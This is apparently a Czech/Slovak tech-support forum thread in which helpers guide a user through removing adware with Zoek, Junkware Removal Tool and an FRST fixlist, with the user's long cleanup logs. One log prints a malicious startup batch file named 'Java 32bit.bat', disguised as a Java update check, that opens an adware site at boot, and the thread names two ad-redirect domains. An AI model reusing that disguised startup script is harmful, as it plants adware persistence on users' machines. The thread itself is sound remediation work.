ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 25258 B
LocalService => 0 B
NetworkService => 0 B
NetworkService => 0 B
mifoI => 6915571 B

RecycleBin => 0 B
EmptyTemp: => 784.4 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 04:54:44 ====

Re: Zapnutie prehliadača po spustení pc

Napsal: 18 zář 2019 09:21
od Rudy
Tawk ještě vyčistíme prohlížeče. Spusťte postupně tyto utility:

1. Stahnete Zoek.exe http://download.bleepingcomputer.com/smeenk/zoek.exe a ulozte jej na plochu

Pokud pouzivate Win Vista ci W7, kliknete na Zoek pravym a dejte Run As Administrator ci Spustit jako spravce
Do okna vlozte skript nize




autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;





Nasledne kliknete na Run Script
PC provede opravu, restartuje se a da Vam log, jeho obsah vlozte sem.

a

2. Junkware removal tool: https://www.stahuj.cz/utility_a_ostatni ... oval-tool/
•Ulozte nejlepe na plochu
•Po spusteni se zobrazi licencni podminky, stisknete libovolnou klavesu
•Probehne vytvoreni zalohy a nasledne prohledavani
•Probehne skenovani a pak se objevi log, pripadne bude ulozen v c:\JRT jako JRT.txt, ten sem vlozte.

Re: Zapnutie prehliadača po spustení pc

Napsal: 18 zář 2019 21:12
od mifoIV
Stále sa po zapnutí zapne prehliadač s reklamou. Ale tesne pred tým sa na stotinu sekundy zobrazí cmd v ktorokm niečo prebehne. Ak vám to pomôže stránka na ktorú ma to dáva je http://larati.net/-36689VRBU/COk8?rndad ... 1568837825

Zoek.exe v5.0.0.2 Updated 03-May-2018(Online Version)
Tool run by mifoI on st 18. 09. 2019 at 21:49:57,92.
Microsoft Windows 10 Home 10.0.17763 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\mifoI\AppData\Local\Temp\scoped_dir9596_1172355166\zoek.exe [Scan all users] [Script inserted]

==== System Restore Info ======================

18. 9. 2019 21:50:59 Zoek.exe System Restore Point Created Successfully.

==== Reset Hosts File ======================

# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
::1 localhost

==== Empty Folders Check ======================

C:\PROGRA~2\AGEIA Technologies deleted successfully
C:\PROGRA~2\COMMON~1\Symantec Shared deleted successfully
C:\PROGRA~3\SoftwareDistribution deleted successfully
C:\Users\mifoI\AppData\Roaming\CareCenter deleted successfully
C:\Users\mifoI\AppData\Local\DBG deleted successfully
C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\DBG deleted successfully
C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Packages deleted successfully

==== Deleting CLSID Registry Keys ======================


==== Deleting CLSID Registry Values ======================


==== Deleting Services ======================


==== FireFox Fix ======================

Deleted from C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default\prefs.js:

Added to C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default\prefs.js:
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

==== Deleting Files \ Folders ======================

C:\PROGRA~2\AGEIA Technologies not found
C:\PROGRA~3\ProductData deleted
C:\PROGRA~3\Package Cache deleted
C:\Users\mifoI\AppData\Local\AVAST Software deleted
C:\Users\mifoI\AppData\Local\CrashRpt deleted
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\CM21775.tmp deleted
C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default\extensions\partnerdefaults@mozilla.com deleted
"C:\Users\mifoI\AppData\Roaming\vlc\vlcrc" deleted
"C:\Users\mifoI\AppData\Roaming\vlc" deleted

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

==== Firefox Extensions ======================

ProfilePath: C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default
- Undetermined - %ProfilePath%\extensions\abb-acer@amazon.com
- Language Pack - %ProfilePath%\extensions\langpack-ar@firefox.mozilla.org
- Language Pack - %ProfilePath%\extensions\langpack-bg@firefox.mozilla.org
- Czech CZ Language Pack - %ProfilePath%\extensions\langpack-cs@firefox.mozilla.org
- Dansk da Language Pack - %ProfilePath%\extensions\langpack-da@firefox.mozilla.org
- Deutsch DE Language Pack - %ProfilePath%\extensions\langpack-de@firefox.mozilla.org
- Language Pack - %ProfilePath%\extensions\langpack-el@firefox.mozilla.org
- English US Language Pack - %ProfilePath%\extensions\langpack-en-US@firefox.mozilla.org
- Espaol Espaa Language Pack - %ProfilePath%\extensions\langpack-es-ES@firefox.mozilla.org
- Estonian Language Pack - %ProfilePath%\extensions\langpack-et@firefox.mozilla.org
- Finnish Language Pack - %ProfilePath%\extensions\langpack-fi@firefox.mozilla.org
- Franais Language Pack - %ProfilePath%\extensions\langpack-fr@firefox.mozilla.org
- Hebrew IL Language Pack - %ProfilePath%\extensions\langpack-he@firefox.mozilla.org
- Magyar HU Language Pack - %ProfilePath%\extensions\langpack-hu@firefox.mozilla.org
- Italiano IT Language Pack - %ProfilePath%\extensions\langpack-it@firefox.mozilla.org
- Japanese Language Pack - %ProfilePath%\extensions\langpack-ja@firefox.mozilla.org
- Korean KR Language Pack - %ProfilePath%\extensions\langpack-ko@firefox.mozilla.org
- Lietuvi Language Pack - %ProfilePath%\extensions\langpack-lt@firefox.mozilla.org
- Norsk bokml NO Language Pack - %ProfilePath%\extensions\langpack-nb-NO@firefox.mozilla.org
- Nederlands NL Language Pack - %ProfilePath%\extensions\langpack-nl@firefox.mozilla.org
- Polski Language Pack - %ProfilePath%\extensions\langpack-pl@firefox.mozilla.org
- Portugus pt-BR Language Pack - %ProfilePath%\extensions\langpack-pt-BR@firefox.mozilla.org
- Portugus Europeu Language Pack - %ProfilePath%\extensions\langpack-pt-PT@firefox.mozilla.org
- Russian RU Language Pack - %ProfilePath%\extensions\langpack-ru@firefox.mozilla.org
- Slovak SK Language Pack - %ProfilePath%\extensions\langpack-sk@firefox.mozilla.org
- Slovenski jezik Language Pack - %ProfilePath%\extensions\langpack-sl@firefox.mozilla.org
- sr Language Pack - %ProfilePath%\extensions\langpack-sr@firefox.mozilla.org
- Svenska SE Language Pack - %ProfilePath%\extensions\langpack-sv-SE@firefox.mozilla.org
- Language Pack - %ProfilePath%\extensions\langpack-th@firefox.mozilla.org
- Trke TR Language Pack - %ProfilePath%\extensions\langpack-tr@firefox.mozilla.org
- Ukrainian UA Language Pack - %ProfilePath%\extensions\langpack-uk@firefox.mozilla.org
- Chinese Simplified zh-CN Language Pack - %ProfilePath%\extensions\langpack-zh-CN@firefox.mozilla.org
- Traditional Chinese zh-TW Language Pack - %ProfilePath%\extensions\langpack-zh-TW@firefox.mozilla.org

==== Firefox Plugins ======================


==== Chromium Look ======================

Google Chrome Version: 76.0.3809.132

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
eofcbnmajmjmplflapaojjnihcjkigck - No path found[]
gomekmidlodglbbmalcneegieacbdmki - No path found[]
nladljmabboanhihfkjacnnkgjhnokhj - No path found[]

Avast Online Security - mifoI\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Adaware Secure - mifoI\AppData\Local\Google\Chrome\User Data\Default\Extensions\nladljmabboanhihfkjacnnkgjhnokhj
Chrome Media Router - mifoI\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm
AdBlock - mifoI\Appdata\Roaming\Opera Software\Opera Stable\Extensions\aobdicepooefnbaeokijohmhjlleamfj

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
No DefaultScope Set For HKCU

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"

==== All HKLM and HKCU SearchScopes ======================

HKLM\SearchScopes "DefaultScope"="{51FF1AE5-094C-40B3-AA7B-A51152766C43}"
HKLM\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\SearchScopes\{51FF1AE5-094C-40B3-AA7B-A51152766C43} - http://www.bing.com/search?q={searchTer ... TR&pc=ACTE
HKLM\SearchScopes\{7D24AFA3-9351-459E-A3A6-CCF21BFD8932} - http://www.bing.com/search?q={searchTer ... TR&pc=ACTE
HKLM\Wow6432Node\SearchScopes "DefaultScope"="{51FF1AE5-094C-40B3-AA7B-A51152766C43}"
HKLM\Wow6432Node\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
HKLM\Wow6432Node\SearchScopes\{51FF1AE5-094C-40B3-AA7B-A51152766C43} - http://www.bing.com/search?q={searchTer ... TR&pc=ACTE
HKLM\Wow6432Node\SearchScopes\{7D24AFA3-9351-459E-A3A6-CCF21BFD8932} - http://www.bing.com/search?q={searchTer ... TR&pc=ACTE
HKCU\SearchScopes "DefaultScope"="{012E1000-F331-11DB-8314-0800200C9A66}"
HKCU\SearchScopes\{012E1000-F331-11DB-8314-0800200C9A66} - http://www.google.com/search?q={searchTerms}
HKCU\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} - http://www.bing.com/search?q={searchTer ... ORM=IESR02

==== Reset Google Chrome ======================

C:\Users\mifoI\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\mifoI\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences was reset successfully
C:\Users\mifoI\Appdata\Roaming\Opera Software\Opera Stable\Preferences was reset successfully
C:\Users\mifoI\Appdata\Roaming\Opera Software\Opera Stable\Preferences.backup was reset successfully
C:\Users\mifoI\Appdata\Roaming\Opera Software\Opera Stable\Secure Preferences was reset successfully
C:\Users\mifoI\Appdata\Roaming\Opera Software\Opera Stable\Secure Preferences.backup was reset successfully
C:\Users\mifoI\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully
C:\Users\mifoI\AppData\Local\Google\Chrome\User Data\Default\Web Data copy was reset successfully
C:\Users\mifoI\Appdata\Roaming\Opera Software\Opera Stable\Web Data was reset successfully
C:\Users\mifoI\Appdata\Roaming\Opera Software\Opera Stable\Web Data-journal was reset successfully

==== Empty IE Cache ======================

C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\mifoI\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\mifoI\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully
C:\WINDOWS\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE emptied successfully

==== Empty FireFox Cache ======================

No FireFox Cache found

==== Empty Edge Cache ======================

Edge Cache Emptied Successfully

==== Empty Chrome Cache ======================

C:\Users\mifoI\AppData\Local\Opera Software\Opera Stable\Cache emptied successfully
C:\Users\mifoI\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

No Flash Cache Found

==== Empty All Java Cache ======================

Java Cache cleared successfully

==== C:\zoek_backup content ======================

C:\zoek_backup (files=53 folders=59 61004238 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Default User\AppData\Local\Temp emptied successfully
C:\Users\mifoI\AppData\Local\Temp will be emptied at reboot
C:\WINDOWS\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\WINDOWS\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\WINDOWS\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\WINDOWS\Temp successfully emptied
C:\Users\mifoI\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== EOF on st 18. 09. 2019 at 22:08:47,50 ======================






~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 10 Home x64
Ran by mifoI (Administrator) on st 18. 09. 2019 at 22:11:24,99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 2

Successfully deleted: C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default\extensions\langpack-ru@firefox.mozilla.org\browser\chrome\ru\locale\browser\searchplugins\mailru.xml (File)
Successfully deleted: C:\Users\mifoI\AppData\Roaming\Mozilla\Firefox\Profiles\hfqof5dk.default\extensions\langpack-zh-CN@firefox.mozilla.org\browser\chrome\zh-CN\locale\browser\searchplugins\baidu.xml (File)



Registry: 0





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on st 18. 09. 2019 at 22:13:08,93
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Re: Zapnutie prehliadača po spustení pc

Napsal: 18 zář 2019 21:47
od Conder
:arrow: Jednorazovy vstup :)

:arrow: Otvor poznamkovy blok (Win+R -> notepad -> enter)
  • Skopiruj nasledujuci text a vloz ho do poznamkoveho bloku:

    Kód: Vybrat vše

    Start
CloseProcesses:
CreateRestorePoint:

CMD: type "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Java 32bit.bat"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Java 32bit.bat [2018-01-07] () [File not signed]

Hosts:
EmptyTemp:
End
  • Uloz na plochu s nazvom fixlist.txt
  • Spusti znovu FRST a klikni na Fix
  • Po dokonceni si FRST vyziada restart PC, potvrd kliknutim na OK
  • Po restartovani PC bude na ploche subor Fixlog.txt, jeho obsah sem skopiruj

Re: Zapnutie prehliadača po spustení pc

Napsal: 19 zář 2019 08:17
od mifoIV
Už to nerobí. Dakujem veľmi

Fix result of Farbar Recovery Scan Tool (x64) Version: 14-09-2019
Ran by mifoI (19-09-2019 09:09:07) Run:2
Running from C:\Users\mifoI\OneDrive\Počítač
Loaded Profiles: mifoI (Available Profiles: mifoI)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:

CMD: type "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Java 32bit.bat"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Java 32bit.bat [2018-01-07] () [File not signed]

Hosts:
EmptyTemp:
End
*****************

Processes closed successfully.
Restore point was successfully created.

========= type "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Java 32bit.bat" =========

@echo off
TITLE Java update check..
start "" http://brisktopia.com/COk8
========= End of CMD: =========

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Java 32bit.bat => moved successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 10510336 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9510054 B
Java, Flash, Steam htmlcache => 13903886 B
Windows/system/drivers => 329179 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 384002511 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 2708 B
LocalService => 0 B
NetworkService => 0 B
NetworkService => 0 B
mifoI => 7486025 B

RecycleBin => 0 B
EmptyTemp: => 406 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 09:09:20 ====

Re: Zapnutie prehliadača po spustení pc

Napsal: 19 zář 2019 09:27
od Rudy
To jsme rádi. I za kolegu: nemáte zač! :)
Všechny časy jsou v UTC+01:00
Stránka 1 z 1

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz